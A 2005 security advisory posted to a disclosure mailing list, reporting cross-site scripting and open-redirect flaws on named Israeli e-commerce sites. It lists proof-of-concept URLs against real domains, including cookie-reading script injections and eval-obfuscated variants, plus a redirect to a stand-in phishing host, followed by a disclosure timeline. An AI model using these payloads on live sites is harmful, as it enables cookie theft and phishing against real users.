[<prev] [next>] [day] [month] [year] [list]
Message-ID: <0IA200827N6MOD20@i_mtaout3.012.net.il>
From: avivra at 012.net.il (Aviv Raff)
Subject: Leading Israeli e-commerce sites XSS
vulnerabilities advisory
Leading Israeli e-commerce sites XSS vulnerabilities advisory
URL: <http://www.raffon.net/advisories/commxss.html>
http://www.raffon.net/advisories/commxss.html
Date: January 10, 2005
Author: Aviv Raff
Introduction
Many leading Israeli e-commerce sites are phishing enabled, and contain
pages which allow injecting code that can execute arbitrary scripts.
Technical Details
Many leading Israeli e-commerce sites generate dynamic HTML web pages using
user-submitted data, and data from other sources. Most of these sites do not
filter the data before presenting it to the user, and therefore are
vulnerable to Cross-Site Scripting. They allow injecting code that can
execute arbitrary scripts, steal the user's cookie, or display fake pages.
P1000 web site allows redirecting to external pages using a simple query
string input, which can be easily exploited by phishers.
Examples
NetAction:
http://www.netaction.co.il/search.php?qsn=<img%20src=Images/space.gif%20onlo
ad=alert(document.cookie)%20>
http://www.netaction.co.il/personal.php?formPersonalID="><img%20src=Images/s
pace.gif%20onload=alert(document.cookie)%20>
http://www.netaction.co.il/contact.php?formFirstName="><img%20src=Images/spa
ce.gif%20onload=alert(document.cookie)%20>
P1000:
http://www.p1000.co.il/default.asp?urladd=http://www.phisher.com
Wallashops:
http://www.wallashops.co.il/shopmind_portal_heb/main.asp?name="><script>aler
t(document.cookie)</script>
http://www.wallashops.co.il/shopmind_portal_heb/main.asp?name="%20onmouseove
r=eval("al"%2B"ert(doc"%2B"ument.coo"%2B"kie)")%20"
Zap:
http://www.zap.co.il/gsearch.asp?keyword=<script>alert(document.cookie)</scr
ipt>
GetIt:
http://www.getit.co.il/ie2/ProdList_Search.asp?sw1=<script>alert(document.co
okie)</script>
Sakal Online:
http://www.sakal.co.il/jsp/pg/SearchResultNew.jsp?searchType=byName&keyWord=
<script>alert(document.cookie)</script>
NfcShop:
http://shop.nfc.co.il/signin.asp?msg=<script>alert(document.cookie)</script>
Daka90:
http://daka90.ynet.co.il/Login/CdaPersonalAreaLogin/1,2141,,00.html?txtemail
='><script>alert(document.cookie)</script>
Olsale:
http://www.olsale.co.il/olsale/Login.aspx?urlsource=><script>alert(document.
cookie)</script>&type=1&rtype=1
Issta:
http://www.issta.co.il/heb/flight_details.asp?product_id=2092&source_id=6&pr
ice_id=3944&from_date='><script>alert(document.cookie)</script>10/04/2004&to
_date=31/12/2004&s=hp&file_name=main\regularflightBottom1.xml
http://www.issta.co.il/heb/flight_details.asp?product_id=2092&source_id=6&pr
ice_id=3944&from_date='%20onmouseover=alert(document.cookie)%20x='10/04/2004
&to_date=31/12/2004&s=hp&file_name=main\regularflightBottom1.xml
Parsi:
http://www.parsi.co.il/SignIn.asp?referrer="><script>alert(document.cookie)<
/script>
http://www.parsi.co.il/SignIn.asp?referrer="><img%20src=/new_images/cat_p_do
t.jpg%20onload=eval("alert(doc"%2B"ume"%2B"nt."%2B"co"%2B"okie)",10)%20>
Arkia:
http://www.arkia.co.il/click/cl_4005.main?p_domestic_yn="><iframe%20src="htt
p://www.arkia.co.il/"%20onload="if%20(document.cookie!='')alert(document.coo
kie)"></iframe>
Printmall:
https://www.printmall.co.il/Artists/Join.asp?Artsts_FName="><script>alert(do
cument.cookie)</script>
One (This is actually a leading sport website, but it has a paid premium
section and also contains links to other e-commerce sites):
http://www.one.co.il/one/search.asp?data=<script>alert(document.cookie)</scr
ipt>
http://www.one.co.il/search/MoreArticals.asp?data=<script>alert(document.coo
kie)</script>
Solutions
All of the sites were contacted via email, or a suggestion form on
27/12/2004.
Netaction, P1000, GetIt, Daka90, Arkia and Printmall sites have already
fixed the vulnerabilities.
Wallashops, Issta and Parsi sites are partly fixed.
Other sites are still vulnerable, and one should be careful following a link
to those sites, or give confidential information.
Disclaimer: The information in this advisory and any of its demonstrations
is provided "as is" without warranty of any kind.
-- Copyright C 2004-2005 Aviv Raff. --
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20050110/733c6e5b/attachment.html
Powered by blists - more mailing lists